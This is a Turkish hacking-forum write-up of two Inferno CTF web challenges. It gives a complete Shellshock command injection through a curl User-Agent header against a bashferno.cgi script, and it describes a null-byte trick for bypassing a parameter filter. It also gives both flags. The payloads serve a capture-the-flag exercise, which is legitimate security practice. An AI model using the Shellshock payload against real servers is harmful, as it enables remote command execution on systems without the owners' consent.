Inferno CTF | Web soruları çözümü

Ranger_THT

Katılımcı Üye
11 Ağu 2018
261
10
/etc/shadow


1-
xlf1u4.png

we will we will shock you


YmQimw.png

Siteye giriş yaptığımızda apache2'nin default sayfası karşımıza geliyordu .


In2z72.png

Siteye ctrl+u ile bakınca bashferno.cgi olduğunu görüyorduk .

nLqZoQ.png

/bashferno.cgi dosyasında bizi bir shellshock zafiyeti bekliyordu .

Sb1qn7.png


curl -H "user-agent: () { :; }; echo ; echo; /bin/bash -c 'cat flag_for_this_INFERNO.txt'" http://104.197.168.32:17012/bashferno.cgi curl ile flagımızı alıyorduk . FLAG: infernoCTF{F33l_Th3_Sh0ck}

-----------------------------------------------------------------------------------------------------------


UHNftd.png

Dante's Personel Home Page

1mQUlx.png

Siteye girince bizi bu şekilde bir anasayfa karşılıyor .

4aKayU.png

_ gibi karakterler yasak olduğu için .. yapıyoruz . ?..magic..=
wXarEO.png

tht%00$dark$ yaparak flagımızı alıyoruz . FLAG : infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.